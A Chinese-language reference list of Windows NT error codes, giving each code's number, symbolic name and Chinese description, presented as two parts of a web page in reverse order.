1779L RPC_X_SS_CANNOT_GET_CALL_HANDLE　　　 占位程序无法取得调用句柄。
1780L RPC_X_NULL_REF_POINTER　　　　　　　　向占位程序传送了空的索引指针。
1781L RPC_X_ENUM_VALUE_OUT_OF_RANGE　　　　 枚举值越界。
1782L RPC_X_BYTE_COUNT_TOO_SMALL　　　　　　字节计数太小。
1783L RPC_X_BAD_STUB_DATA　　　　　　　　　 占位程序接收到错误数据。
1784L ERROR_INVALID_USER_BUFFER　　　　　　 提供给请求操作的用户缓冲区无效。
1785L ERROR_UNRECOGNIZED_MEDIA　　　　　　　磁盘媒体无法识别。可能未被格式化。
1786L ERROR_NO_TRUST_LSA_SECRET　　　　　　 工作站没有信任机密。
1787L ERROR_NO_TRUST_SAM_ACCOUNT　　　　　　域控制器没有该工作站的帐户。
1788L ERROR_TRUSTED_DOMAIN_FAILURE　　　　　主域和受信任域间的信任关系失败。
1789L ERROR_TRUSTED_RELATIONSHIP_FAILURE　　此工作站和主域间的信任关系失败。
1790L ERROR_TRUST_FAILURE　　　　　　　　　 网络登录失败。
1791L RPC_S_CALL_IN_PROGRESS　　　　　　　　此线程的远程过程调用已在进行中。
1792L ERROR_NETLOGON_NOT_STARTED　　　　　　试图登录，但是网络登录服务没有启动。
1793L ERROR_ACCOUNT_EXPIRED　　　　　　　　 用户帐户到期。
1794L ERROR_REDIRECTOR_HAS_OPEN_HANDLES　　 重定向程序正使用中，不能卸装。
1795L ERROR_PRINTER_DRIVER_ALREADY_INSTALLED　指定的打印机驱动程序已安装。
1796L ERROR_UNKNOWN_PORT　　　　　　　　　　指定的端口未知。
1797L ERROR_UNKNOWN_PRINTER_DRIVER　　　　　未知的打印机驱动程序。
1798L ERROR_UNKNOWN_PRINTPROCESSOR　　　　　未知的打印处理器。
1799L ERROR_INVALID_SEPARATOR_FILE　　　　　指定的分隔页文件无效。
1800L ERROR_INVALID_PRIORITY　　　　　　　　指定的优先级无效。
1801L ERROR_INVALID_PRINTER_NAME　　　　　　打印机名称无效。
1802L ERROR_PRINTER_ALREADY_EXISTS　　　　　打印机已存在。
1803L ERROR_INVALID_PRINTER_COMMAND　　　　 打印机命令无效。
1804L ERROR_INVALID_DATATYPE　　　　　　　　指定的数据类型无效。
1805L ERROR_INVALID_ENVIRONMENT　　　　　　 指定的环境无效。
1806L RPC_S_NO_MORE_BINDINGS　　　　　　　　没有更多的绑定。
1807L ERROR_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT　所使用的帐户为域间信任帐户。请使用
                                            您的普通用户帐户或远程用户帐户访问本服务器。
1808L ERROR_NOLOGON_WORKSTATION_TRUST_ACCOUNT　所用帐户为工作站信任帐户。请使用您的
                                            普通用户帐户或远程用户帐户访问本服务器。
1809L ERROR_NOLOGON_SERVER_TRUST_ACCOUNT　　所使用的帐户为服务器信任帐户。请
                                            使用您的普通用户帐户或远程用户帐户
                                            访问本服务器。
1810L ERROR_DOMAIN_TRUST_INCONSISTENT　　　 指定域的名称或安全标识 (SID) 与该域
                                            的信任信息不一致。
1811L ERROR_SERVER_HAS_OPEN_HANDLES　　　　 服务器在使用中且无法卸载。
1812L ERROR_RESOURCE_DATA_NOT_FOUND　　　　 指定的映像文件不包含资源区域。
1813L ERROR_RESOURCE_TYPE_NOT_FOUND　　　　 找不到映像文件中指定的资源类型。
1814L ERROR_RESOURCE_NAME_NOT_FOUND　　　　 找不到映像文件中指定的资源名。
1815L ERROR_RESOURCE_LANG_NOT_FOUND　　　　 找不到映像文件中指定的资源语言标识。
1816L ERROR_NOT_ENOUGH_QUOTA　　　　　　　　配额不足，无法处理此命令。
1817L RPC_S_NO_INTERFACES
1818L RPC_S_CALL_CANCELLED　　　　　　　　　处理该调用时更换了服务器。
1819L RPC_S_BINDING_INCOMPLETE　　　　　　　绑定句柄不包含所有需要的信息。
1820L RPC_S_COMM_FAILURE　　　　　　　　　　通讯失败。
1821L RPC_S_UNSUPPORTED_AUTHN_LEVEL　　　　 不支持请求的验证级别。
1822L RPC_S_NO_PRINC_NAME　　　　　　　　　 没有注册主名称。
1823L RPC_S_NOT_RPC_ERROR　　　　　　　　　 指定的错误不是有效的 Windows RPC 错误码。
1824L RPC_S_UUID_LOCAL_ONLY　　　　　　　　 已配置一个只在这部计算机上有效的 UUID。
1825L RPC_S_SEC_PKG_ERROR　　　　　　　　　 发生一个安全包特有的错误。
1826L RPC_S_NOT_CANCELLED　　　　　　　　　 线程未取消。
1827L RPC_X_INVALID_ES_ACTION　　　　　　　 无效的编码/解码句柄操作。
1828L RPC_X_WRONG_ES_VERSION　　　　　　　　序列化包装的版本不兼容。
1829L RPC_X_WRONG_STUB_VERSION　　　　　　　RPC 存根的版本不兼容。
1830L RPC_X_INVALID_PIPE_OBJECT　　　　　　 Idl 管道对象无效或已破坏。
1831L RPC_X_INVALID_PIPE_OPERATION　　　　　此操作对于给定的 idl 管道对象无效。
1832L RPC_X_WRONG_PIPE_VERSION　　　　　　　Idl 管道版本不受支持。
1898L RPC_S_GROUP_MEMBER_NOT_FOUND　　　　　找不到该组成员。
1899L EPT_S_CANT_CREATE　　　　　　　　　　 无法创建终结点映射表数据库项。
1900L RPC_S_INVALID_OBJECT　　　　　　　　　对象通用唯一标识 (UUID) 为 nil UUID。
1901L ERROR_INVALID_TIME　　　　　　　　　　指定的时间无效。
1902L ERROR_INVALID_FORM_NAME　　　　　　　 指定的格式名称无效。
1903L ERROR_INVALID_FORM_SIZE　　　　　　　 指定的格式大小无效。
1904L ERROR_ALREADY_WAITING　　　　　　　　 指定的打印机句柄正在等候处理。
1905L ERROR_PRINTER_DELETED　　　　　　　　 已删除指定的打印机。
1906L ERROR_INVALID_PRINTER_STATE　　　　　 打印机的状态无效。
1907L ERROR_PASSWORD_MUST_CHANGE　　　　　　用户首次登录前，必须先更改其密码。
1908L ERROR_DOMAIN_CONTROLLER_NOT_FOUND　　 找不到此域的域控制器。
1909L ERROR_ACCOUNT_LOCKED_OUT　　　　　　　引用的帐户当前已锁定，且可能无法登录。
1910L OR_INVALID_OXID　　　　　　　　　　　 没有发现指定的此对象导出者。
1911L OR_INVALID_OID　　　　　　　　　　　　没有发现指定的对象。
1912L OR_INVALID_SET　　　　　　　　　　　　没有发现指定的对象解析器。
1913L RPC_S_SEND_INCOMPLETE　　　　　　　　 一些待发数据仍停留在请求缓冲区内。
2000L ERROR_INVALID_PIXEL_FORMAT　　　　　　无效的像素格式。
2001L ERROR_BAD_DRIVER　　　　　　　　　　　指定的驱动程序无效。
2002L ERROR_INVALID_WINDOW_STYLE　　　　　　窗口样式或类别属性对此操作无效。
2003L ERROR_METAFILE_NOT_SUPPORTED　　　　　不支持请求的图元文件操作。
2004L ERROR_TRANSFORM_NOT_SUPPORTED　　　　 不支持请求的变换操作。
2005L ERROR_CLIPPING_NOT_SUPPORTED　　　　　不支持请求的剪切操作。
2138L ERROR_NO_NETWORK　　　　　　　　　　　网络未连接或启动。
2202L ERROR_BAD_USERNAME　　　　　　　　　　指定的用户名无效。
2250L ERROR_NOT_CONNECTED　　　　　　　　　 此网络连接不存在。
2401L ERROR_OPEN_FILES　　　　　　　　　　　此连接已经打开文件或者有些请求被搁置。
2402L ERROR_ACTIVE_CONNECTIONS　　　　　　　使用中的连接仍存在。
2404L ERROR_DEVICE_IN_USE　　　　　　　　　 设备正由活动进程使用，无法断开。
3000L ERROR_UNKNOWN_PRINT_MONITOR　　　　　 指定了未知的打印监视器。
3001L ERROR_PRINTER_DRIVER_IN_USE　　　　　 指定的打印机驱动程序当前正在使用。
3002L ERROR_SPOOL_FILE_NOT_FOUND　　　　　　找不到缓冲文件。
3003L ERROR_SPL_NO_STARTDOC　　　　　　　　 未发送 StartDocPrinter 调用。
3004L ERROR_SPL_NO_ADDJOB　　　　　　　　　 未发送 AddJob 调用。
3005L ERROR_PRINT_PROCESSOR_ALREADY_INSTALLED　指定的打印处理器已经安装。
3006L ERROR_PRINT_MONITOR_ALREADY_INSTALLED 指定的打印监视器已经安装。
3007L ERROR_INVALID_PRINT_MONITOR　　　　　 该指定的打印监视器不具备所要求的功能。
3008L ERROR_PRINT_MONITOR_IN_USE　　　　　　该指定的打印监视器正在使用中。
3009L ERROR_PRINTER_HAS_JOBS_QUEUED　　　　 当打印机有作业排成队列时此操作请求是不允许的。
3010L ERROR_SUCCESS_REBOOT_REQUIRED　　　　 请求的操作成功。直到重新启动系统前更改将不会生效。
3011L ERROR_SUCCESS_RESTART_REQUIRED　　　　请求的操作成功。直到重新启动服务前更改将不会生效。
4000L ERROR_WINS_INTERNAL　　　　　　　　　 WINS 在处理命令时遇到错误。
4001L ERROR_CAN_NOT_DEL_LOCAL_WINS　　　　　本地的 WINS 不能删除。
4002L ERROR_STATIC_INIT　　　　　　　　　　 文件导入操作失败。
4003L ERROR_INC_BACKUP　　　　　　　　　　　备份操作失败。是否先前已作过完整备份?
4004L ERROR_FULL_BACKUP　　　　　　　　　　 备份操作失败。请检查您备份数据库的目录。
4005L ERROR_REC_NON_EXISTENT　　　　　　　　WINS 数据库中没有这个名称。
4006L ERROR_RPL_NOT_ALLOWED　　　　　　　　 不允许复制一个尚未配置的伙伴。
6118L ERROR_NO_BROWSER_SERVERS_FOUND　　　　此工作组的服务器列表当前无法使用。


Windows NT 错误代码(一)

《一键清理系统垃圾》

Windows NT 错误代码(一)

这篇文章中的信息适用于:
Microsoft Windows NT Server
Microsoft Windows NT Workstation
--------------------------------------------------------------------------------

代码　名称　　　　　　　　　　　　　　　　　说明
--------------------------------------------------------------------------
-8　　LZERROR_UNKNOWNALG　　　　　　　　　　不识别压缩算法。
-7　　LZERROR_BADVALUE　　　　　　　　　　　输入参数超出可接受范围。
-6　　LZERROR_GLOBLOCK　　　　　　　　　　　全局句柄错误。
-5　　LZERROR_GLOBALLOC　　　　　　　　　　 LZFile 结构的内存不足。
-4　　LZERROR_WRITE　　　　　　　　　　　　 输出文件的空间不足。
-3　　LZERROR_READ　　　　　　　　　　　　　压缩文件格式被破坏。
-2　　LZERROR_BADOUTHANDLE　　　　　　　　　输出句柄无效。
-1　　LZERROR_BADINHANDLE　　　　　　　　　 输入句柄无效。
0L　　NO_ERROR　　　　　　　　　　　　　　　没有错误。
0L　　ERROR_SUCCESS　　　　　　　　　　　　 操作成功执行完毕。
1L　　ERROR_INVALID_FUNCTION　　　　　　　　函数不正确。
2L　　ERROR_FILE_NOT_FOUND　　　　　　　　　系统无法找到指定的文件。
3L　　ERROR_PATH_NOT_FOUND　　　　　　　　　系统无法找到指定的路径。
4L　　ERROR_TOO_MANY_OPEN_FILES　　　　　　 系统无法打开文件。
5L　　ERROR_ACCESS_DENIED　　　　　　　　　 访问被拒绝。
6L　　ERROR_INVALID_HANDLE　　　　　　　　　内部文件标识符不正确。
7L　　ERROR_ARENA_TRASHED　　　　　　　　　 存储控制块被破坏。
8L　　ERROR_NOT_ENOUGH_MEMORY　　　　　　　 处理该命令没有足够的存储可用。
9L　　ERROR_INVALID_BLOCK　　　　　　　　　 存储控制块地址无效。
10L　 ERROR_BAD_ENVIRONMENT　　　　　　　　 环境不正确。
11L　 ERROR_BAD_FORMAT　　　　　　　　　　　试图使用不正确的格式加载程序。
12L　 ERROR_INVALID_ACCESS　　　　　　　　　存取代码无效。
13L　 ERROR_INVALID_DATA　　　　　　　　　　数据无效。
14L　 ERROR_OUTOFMEMORY　　　　　　　　　　 执行该操作没有足够的存储可用。
15L　 ERROR_INVALID_DRIVE　　　　　　　　　 系统无法找到指定的驱动器。
16L　 ERROR_CURRENT_DIRECTORY　　　　　　　 目录无法被删除。
17L　 ERROR_NOT_SAME_DEVICE　　　　　　　　 系统无法将文件移到不同的磁盘驱动器。
18L　 ERROR_NO_MORE_FILES　　　　　　　　　 没有其它文件。
19L　 ERROR_WRITE_PROTECT　　　　　　　　　 媒体是写保护的。
20L　 ERROR_BAD_UNIT　　　　　　　　　　　　系统无法找到指定设备。
21L　 ERROR_NOT_READY　　　　　　　　　　　 驱动器没有准备好。
22L　 ERROR_BAD_COMMAND　　　　　　　　　　 设备不识别命令。
23L　 ERROR_CRC　　　　　　　　　　　　　　 数据错误（循环冗余检查）。
24L　 ERROR_BAD_LENGTH　　　　　　　　　　　程序提供了一个命令，但命令长度不正确。
25L　 ERROR_SEEK　　　　　　　　　　　　　　驱动器无法在磁盘上找到
                                            指定区域或磁道。
26L　 ERROR_NOT_DOS_DISK　　　　　　　　　　无法访问指定磁盘。
27L　 ERROR_SECTOR_NOT_FOUND　　　　　　　　驱动器无法找到请求的扇区。
28L　 ERROR_OUT_OF_PAPER　　　　　　　　　　打印机缺纸。
29L　 ERROR_WRITE_FAULT　　　　　　　　　　 系统无法写入指定设备。
30L　 ERROR_READ_FAULT　　　　　　　　　　　系统无法从指定设备读取。
31L　 ERROR_GEN_FAILURE　　　　　　　　　　 附属于系统的设备无法正常工作。
32L　 ERROR_SHARING_VIOLATION　　　　　　　 由于文件被另一个进程所使用，
                                            该进程无法访问文件。
33L　 ERROR_LOCK_VIOLATION　　　　　　　　　由于另一个进程锁定了文件的
                                            一部分，该进程无法访问文件。
34L　 ERROR_WRONG_DISK　　　　　　　　　　　驱动器中的磁盘错误。请将 %2（卷
                                            序列号：%3）插入驱动器 %1 中。
36L　 ERROR_SHARING_BUFFER_EXCEEDED　　　　 打开用于共享的文件过多。
38L　 ERROR_HANDLE_EOF　　　　　　　　　　　到达文件末尾。
39L　 ERROR_HANDLE_DISK_FULL　　　　　　　　磁盘已满。
50L　 ERROR_NOT_SUPPORTED　　　　　　　　　 网络请求不受支持。
51L　 ERROR_REM_NOT_LIST　　　　　　　　　　远程计算机无法使用。
52L　 ERROR_DUP_NAME　　　　　　　　　　　　在网络上存在重复名称。
53L　 ERROR_BAD_NETPATH　　　　　　　　　　 无法找到网络路径。
54L　 ERROR_NETWORK_BUSY　　　　　　　　　　网络忙。
55L　 ERROR_DEV_NOT_EXIST　　　　　　　　　 指定网络资源不再可用。
56L　 ERROR_TOO_MANY_CMDS　　　　　　　　　 已到达网络 BIOS 命令的限制。
57L　 ERROR_ADAP_HDW_ERR　　　　　　　　　　发生网络适配器硬件错误。
58L　 ERROR_BAD_NET_RESP　　　　　　　　　　指定的服务器无法执行请求的操作。
59L　 ERROR_UNEXP_NET_ERR　　　　　　　　　 发生预想不到的网络错误。
60L　 ERROR_BAD_REM_ADAP　　　　　　　　　　远程适配器不兼容。
61L　 ERROR_PRINTQ_FULL　　　　　　　　　　 打印机队列已满。
62L　 ERROR_NO_SPOOL_SPACE　　　　　　　　　在服务器上存储等待被打印的文件
                                            的空间不可用。
63L　 ERROR_PRINT_CANCELLED　　　　　　　　 等待打印的文件被删除。
64L　 ERROR_NETNAME_DELETED　　　　　　　　 指定的网络名称不再可用。
65L　 ERROR_NETWORK_ACCESS_DENIED　　　　　 网络访问被拒绝。
66L　 ERROR_BAD_DEV_TYPE　　　　　　　　　　网络资源类型不正确。
67L　 ERROR_BAD_NET_NAME　　　　　　　　　　无法找到网络名称。
68L　 ERROR_TOO_MANY_NAMES　　　　　　　　　超出本地计算机网络适配器卡
                                            的名称限制。
69L　 ERROR_TOO_MANY_SESS　　　　　　　　　 超出网络 BIOS 会话限制。
70L　 ERROR_SHARING_PAUSED　　　　　　　　　远程服务器暂停或正在启动进程中。
71L　 ERROR_REQ_NOT_ACCEP　　　　　　　　　 网络请求没有被接受。
72L　 ERROR_REDIR_PAUSED　　　　　　　　　　指定的打印机或磁盘设备已暂停。
80L　 ERROR_FILE_EXISTS　　　　　　　　　　 文件已存在。
82L　 ERROR_CANNOT_MAKE　　　　　　　　　　 无法创建目录或文件。
83L　 ERROR_FAIL_I24　　　　　　　　　　　　INT 24 失败。
84L　 ERROR_OUT_OF_STRUCTURES　　　　　　　 无法取得处理此请求的存储空间。
85L　 ERROR_ALREADY_ASSIGNED　　　　　　　　本地设备名已在使用中。
86L　 ERROR_INVALID_PASSWORD　　　　　　　　指定的网络密码不正确。
87L　 ERROR_INVALID_PARAMETER　　　　　　　 参数不正确。
88L　 ERROR_NET_WRITE_FAULT　　　　　　　　 在网络上出现写错误。
89L　 ERROR_NO_PROC_SLOTS　　　　　　　　　 此时，系统无法启动另一个进程。
100L　ERROR_TOO_MANY_SEMAPHORES　　　　　　 无法创建另一个系统信号灯。
101L　ERROR_EXCL_SEM_ALREADY_OWNED　　　　　另一个进程拥有独占的信号灯。
102L　ERROR_SEM_IS_SET　　　　　　　　　　　已设置信号灯且无法关闭。
103L　ERROR_TOO_MANY_SEM_REQUESTS　　　　　 无法再设置信号灯。
104L　ERROR_INVALID_AT_INTERRUPT_TIME　　　 无法在中断时请求独占的信号灯。
105L　ERROR_SEM_OWNER_DIED　　　　　　　　　此信号灯的前一个所有权已结束。
106L　ERROR_SEM_USER_LIMIT　　　　　　　　　为驱动器 1 插入磁盘。
107L　ERROR_DISK_CHANGE　　　　　　　　　　 程序停止，因为替代的软盘未插入。
108L　ERROR_DRIVE_LOCKED　　　　　　　　　　磁盘在使用中，或被另一个进程锁定。
109L　ERROR_BROKEN_PIPE　　　　　　　　　　 管道被终止。
110L　ERROR_OPEN_FAILED　　　　　　　　　　 系统无法打开指定的设备或文件。
111L　ERROR_BUFFER_OVERFLOW　　　　　　　　 文件名过长。
112L　ERROR_DISK_FULL　　　　　　　　　　　 磁盘上的空间不足。
113L　ERROR_NO_MORE_SEARCH_HANDLES　　　　　无法再获得内部文件的标识符。
114L　ERROR_INVALID_TARGET_HANDLE　　　　　 目标内部文件的标识符不正确。
117L　ERROR_INVALID_CATEGORY　　　　　　　　应用程序制作的 IOCTL 调用错误。
118L　ERROR_INVALID_VERIFY_SWITCH　　　　　 校验写入的开关参数值错误。
119L　ERROR_BAD_DRIVER_LEVEL　　　　　　　　系统不支持请求的命令。
120L　ERROR_CALL_NOT_IMPLEMENTED　　　　　　所输入的应用程序程序接口 (API)
                                            将仅在 Windows/NT 模式中工作。
121L　ERROR_SEM_TIMEOUT　　　　　　　　　　 信号灯超时时间已到。
122L　ERROR_INSUFFICIENT_BUFFER　　　　　　 传递到系统调用的数据区太小。
123L　ERROR_INVALID_NAME　　　　　　　　　　文件名、目录名或卷标语法不正确。
124L　ERROR_INVALID_LEVEL　　　　　　　　　 系统调用级别错误。
125L　ERROR_NO_VOLUME_LABEL　　　　　　　　 磁盘没有卷标。
126L　ERROR_MOD_NOT_FOUND　　　　　　　　　 无法找到指定模块。
127L　ERROR_PROC_NOT_FOUND　　　　　　　　　找不到指定的过程。
128L　ERROR_WAIT_NO_CHILDREN　　　　　　　　没有等候的子进程。
129L　ERROR_CHILD_NOT_COMPLETE　　　　　　　%1 应用程序无法在 Windows 模式中运行。
130L　ERROR_DIRECT_ACCESS_HANDLE　　　　　　试图使用操作(而非原始磁盘 I/O)的已打
                                            开磁盘分区的文件句柄。
131L　ERROR_NEGATIVE_SEEK　　　　　　　　　 试图移动文件指针到文件开头之前。
132L　ERROR_SEEK_ON_DEVICE　　　　　　　　　无法在指定的设备或文件上设置文件指针。
133L　ERROR_IS_JOIN_TARGET　　　　　　　　　包含先前加入驱动器的驱动器无法使用
                                            JOIN 或 SUBST 命令。
134L　ERROR_IS_JOINED　　　　　　　　　　　 试图在已被合并的驱动器上使用 JOIN 或
                                            SUBST 命令。
135L　ERROR_IS_SUBSTED　　　　　　　　　　　试图在已经替代的驱动器上使用 JOIN
    或 SUBST 命令。
136L　ERROR_NOT_JOINED　　　　　　　　　　　系统试图删除先前未合并的驱动器的 JO IN。
137L　ERROR_NOT_SUBSTED　　　　　　　　　　 系统试图删除先前未替代的替代驱动器。
138L　ERROR_JOIN_TO_JOIN　　　　　　　　　　系统试图将驱动器合并到合并驱动
                                            器上的目录。
139L　ERROR_SUBST_TO_SUBST　　　　　　　　　系统试图将驱动器替代为替代驱动器上的目录。
140L　ERROR_JOIN_TO_SUBST　　　　　　　　　 系统试图将驱动器合并到
                                            替代驱动器上的目录中。
141L　ERROR_SUBST_TO_JOIN　　　　　　　　　 系统试图将驱动器替代为合并驱动器上的目录。
142L　ERROR_BUSY_DRIVE　　　　　　　　　　　系统无法在此时运行
                                            JOIN 或 SUBST。
143L　ERROR_SAME_DRIVE　　　　　　　　　　　系统无法将驱动器合并到或替代
                                            为相同驱动器上的目录。
144L　ERROR_DIR_NOT_ROOT　　　　　　　　　　目录并非根目录下的子目录。
145L　ERROR_DIR_NOT_EMPTY　　　　　　　　　 目录非空。
146L　ERROR_IS_SUBST_PATH　　　　　　　　　 指定的路径已在替代中使用。
147L　ERROR_IS_JOIN_PATH　　　　　　　　　　资源不足，无法处理此命令。
148L　ERROR_PATH_BUSY　　　　　　　　　　　 此时无法使用指定的路径。
149L　ERROR_IS_SUBST_TARGET　　　　　　　　 企图将驱动器合并或替代为驱动
                                            器上目录是上一个替代的目标的
                                            驱动器。
150L　ERROR_SYSTEM_TRACE　　　　　　　　　　系统跟踪信息未在 CONFIG.SYS 文件中
                                            指定，或不允许跟踪。
151L　ERROR_INVALID_EVENT_COUNT　　　　　　 指定的信号灯事件个数错误。
152L　ERROR_TOO_MANY_MUXWAITERS　　　　　　 已设置过多的信号灯。
153L　ERROR_INVALID_LIST_FORMAT　　　　　　 列表错误。
154L　ERROR_LABEL_TOO_LONG　　　　　　　　　所输入的卷标超过 11 个字符。前 11 个字符
                                            写入到磁盘中。第 11 个字符限制以后的字符
                                            自动被删除。
155L　ERROR_TOO_MANY_TCBS　　　　　　　　　 无法创建另一个线程。
156L　ERROR_SIGNAL_REFUSED　　　　　　　　　接收进程已拒绝此信号。
157L　ERROR_DISCARDED　　　　　　　　　　　 段已被放弃且无法锁定。
158L　ERROR_NOT_LOCKED　　　　　　　　　　　该区域已经解除锁定。
159L　ERROR_BAD_THREADID_ADDR　　　　　　　 线程标识的地址错误。
160L　ERROR_BAD_ARGUMENTS　　　　　　　　　 传递到 DosExecPgm 的参数字
                                            符串错误。
161L　ERROR_BAD_PATHNAME　　　　　　　　　　指定路径名无效。
162L　ERROR_SIGNAL_PENDING　　　　　　　　　信号已暂停。
164L　ERROR_MAX_THRDS_REACHED　　　　　　　 无法在系统中创建更多的线程。
167L　ERROR_LOCK_FAILED　　　　　　　　　　 无法锁定文件的范围。
170L　ERROR_BUSY　　　　　　　　　　　　　　所要求的资源正在使用中。
173L　ERROR_CANCEL_VIOLATION　　　　　　　　对于提供取消区域进行锁定的
                                            请求不明显。
174L　ERROR_ATOMIC_LOCKS_NOT_SUPPORTED　　　文件系统不支持锁定类型的最
                                            小单元更改。
180L　ERROR_INVALID_SEGMENT_NUMBER　　　　　系统检测出错误的段号。
182L　ERROR_INVALID_ORDINAL　　　　　　　　 操作系统无法运行 %1。
183L　ERROR_ALREADY_EXISTS　　　　　　　　　试图创建已存在文件。
186L　ERROR_INVALID_FLAG_NUMBER　　　　　　 所传递的标记错误。
187L　ERROR_SEM_NOT_FOUND　　　　　　　　　 找不到指定的系统信号灯名称。
188L　ERROR_INVALID_STARTING_CODESEG　　　　操作系统无法运行 %1。
189L　ERROR_INVALID_STACKSEG　　　　　　　　操作系统无法运行 %1。
190L　ERROR_INVALID_MODULETYPE　　　　　　　操作系统无法运行 %1。
191L　ERROR_INVALID_EXE_SIGNATURE　　　　　 %1 不能在 Windows/NT 模式下运行。
192L　ERROR_EXE_MARKED_INVALID　　　　　　　操作系统无法运行 %1。
193L　ERROR_BAD_EXE_FORMAT　　　　　　　　　%1 不是基于 Windows 的应用程序。
194L　ERROR_ITERATED_DATA_EXCEEDS_64k　　　 操作系统无法运行 %1。
195L　ERROR_INVALID_MINALLOCSIZE　　　　　　操作系统无法运行 %1。
196L　ERROR_DYNLINK_FROM_INVALID_RING　　　 操作系统无法运行此应用程序。
197L　ERROR_IOPL_NOT_ENABLED　　　　　　　　操作系统当前的配置不能运行
                                            此应用程序。
198L　ERROR_INVALID_SEGDPL　　　　　　　　　操作系统无法运行 %1。
199L　ERROR_AUTODATASEG_EXCEEDS_64k　　　　 操作系统无法运行此应用程序。
200L　ERROR_RING2SEG_MUST_BE_MOVABLE　　　　代码段不可大于或等于 64K。
201L　ERROR_RELOC_CHAIN_XEEDS_SEGLIM　　　　操作系统无法运行 %1。
202L　ERROR_INFLOOP_IN_RELOC_CHAIN　　　　　操作系统无法运行 %1。
203L　ERROR_ENVVAR_NOT_FOUND　　　　　　　　系统找不到输入的环境选项。
205L　ERROR_NO_SIGNAL_SENT　　　　　　　　　在命令子树中的进程没有信号句柄。
206L　ERROR_FILENAME_EXCED_RANGE　　　　　　文件名或扩展名过长。
207L　ERROR_RING2_STACK_IN_USE　　　　　　　第 2 环堆栈已被占用。
208L　ERROR_META_EXPANSION_TOO_LONG　　　　 没有正确输入全局文件名通配符
                                            * 或 ?，或指定过多的文件
                                            名通配符。
209L　ERROR_INVALID_SIGNAL_NUMBER　　　　　 正在发送的信号错误。
210L　ERROR_THREAD_1_INACTIVE　　　　　　　 无法设置信号处理程序。
212L　ERROR_LOCKED　　　　　　　　　　　　　段已锁定且无法重新分配。
214L　ERROR_TOO_MANY_MODULES　　　　　　　　附加到此程序或动态链接模块的
                                            动态链接模块太多。
215L　ERROR_NESTING_NOT_ALLOWED　　　　　　 不能嵌套调用LoadModule。
230L　ERROR_BAD_PIPE　　　　　　　　　　　　管道状态无效。
231L　ERROR_PIPE_BUSY　　　　　　　　　　　 所有管道实例忙。
232L　ERROR_NO_DATA　　　　　　　　　　　　 在处理过程中管道关闭。
233L　ERROR_PIPE_NOT_CONNECTED　　　　　　　在管道的另一端没有进行处理。
234L　ERROR_MORE_DATA　　　　　　　　　　　 更多数据可用。
240L　ERROR_VC_DISCONNECTED　　　　　　　　 取消会话。
254L　ERROR_INVALID_EA_NAME　　　　　　　　 指定的 EA 名称无效。
255L　ERROR_EA_LIST_INCONSISTENT　　　　　　EA 不一致。
259L　ERROR_NO_MORE_ITEMS　　　　　　　　　 没有其他可用数据。
266L　ERROR_CANNOT_COPY　　　　　　　　　　 无法使用复制 API。
267L　ERROR_DIRECTORY　　　　　　　　　　　 目录名无效。
275L　ERROR_EAS_DIDNT_FIT　　　　　　　　　 EA 在缓冲区中不适用。
276L　ERROR_EA_FILE_CORRUPT　　　　　　　　 装在文件系统上的 EA 文件已损坏。
277L　ERROR_EA_TABLE_FULL　　　　　　　　　 装在文件系统上的 EA 文件中的 EA 表已满。
278L　ERROR_INVALID_EA_HANDLE　　　　　　　 指定的 EA 句柄无效。
282L　ERROR_EAS_NOT_SUPPORTED　　　　　　　 安装的文件系统不支持扩展属性。
288L　ERROR_NOT_OWNER　　　　　　　　　　　 企图释放并非呼叫方所拥有的多
                                            用户终端运行程序。
298L　ERROR_TOO_MANY_POSTS　　　　　　　　　对信号灯发送的信号过多。
299L　ERROR_PARTIAL_COPY　　　　　　　　　　仅完成部分的
                                            ReadProcessMemoty 或
                                            WriteProcessMemory 请求。
317L　ERROR_MR_MID_NOT_FOUND　　　　　　　　在 %2 的消息文件中，系统无
                                            法找到消息号为 0x%1 的
                                            消息。
487L　ERROR_INVALID_ADDRESS　　　　　　　　 试图访问无效地址。
534L　ERROR_ARITHMETIC_OVERFLOW　　　　　　 运算结果超过 32 位。
535L　ERROR_PIPE_CONNECTED　　　　　　　　　管道的另一端有一进程。
536L　ERROR_PIPE_LISTENING　　　　　　　　　等候打开管道另一端的进程。
994L　ERROR_EA_ACCESS_DENIED　　　　　　　　访问 EA 被拒绝。
995L　ERROR_OPERATION_ABORTED　　　　　　　 由于线程已存在或应用程序的请求，I/O 操作被终止。
996L　ERROR_IO_INCOMPLETE　　　　　　　　　 重叠 IO 事件不在信号状态中。
997L　ERROR_IO_PENDING　　　　　　　　　　　正在处理重叠的 IO 操作。
998L　ERROR_NOACCESS　　　　　　　　　　　　内存分配访问无效。
999L　ERROR_SWAPERROR　　　　　　　　　　　 访问页文件出错。
1001L ERROR_STACK_OVERFLOW　　　　　　　　　太多层递归嵌套调用，栈溢出。
1002L ERROR_INVALID_MESSAGE　　　　　　　　 窗口无法处理已发送的消息。
1003L ERROR_CAN_NOT_COMPLETE　　　　　　　　因为某些原因无法完成该功能。
1004L ERROR_INVALID_FLAGS　　　　　　　　　 该标志无效。
1005L ERROR_UNRECOGNIZED_VOLUME　　　　　　 卷不包括可识别的文件系统。
                                            请确认是否加载所有必
                                            须的文件系统驱动程序
                                            或卷是否已损坏。
1006L ERROR_FILE_INVALID　　　　　　　　　　文件的卷已从外部进行改变，且已打开的文件不再有效。
1007L ERROR_FULLSCREEN_MODE　　　　　　　　 要求的操作无法以全屏幕模式执行。
1008L ERROR_NO_TOKEN　　　　　　　　　　　　试图引用不存在的令牌。
1009L ERROR_BADDB　　　　　　　　　　　　　 配置注册表数据库损坏。
1010L ERROR_BADKEY　　　　　　　　　　　　　配置注册表键值无效。
1011L ERROR_CANTOPEN　　　　　　　　　　　　无法打开配置注册表键值。
1012L ERROR_CANTREAD　　　　　　　　　　　　无法读取配置注册表键值。
1013L ERROR_CANTWRITE　　　　　　　　　　　 无法写配置注册表键值。
1014L ERROR_REGISTRY_RECOVERED　　　　　　　必须使用记录或另一备份以
                                            恢复包含系统注册表数据
                                            的文件。恢复成功。
1015L ERROR_REGISTRY_CORRUPT　　　　　　　　注册表损坏。包含注册表数据的某一文
                                            件结构损坏，或系统的文件内存映像损
                                            坏，或因为替代副本、日志缺少或损坏
                                            而无法恢复文件。
1016L ERROR_REGISTRY_IO_FAILED　　　　　　　由注册表引起的 I/O 操作发生了不可恢
                                            复的错误。注册表将不能读取、写
                                            出或刷新包含注册表系统图像的其中一
                                            个文件。
1017L ERROR_NOT_REGISTRY_FILE　　　　　　　 系统试图在注册表中加载或还原文件，
                                            而指定的文件不具有注册表文件的格式。
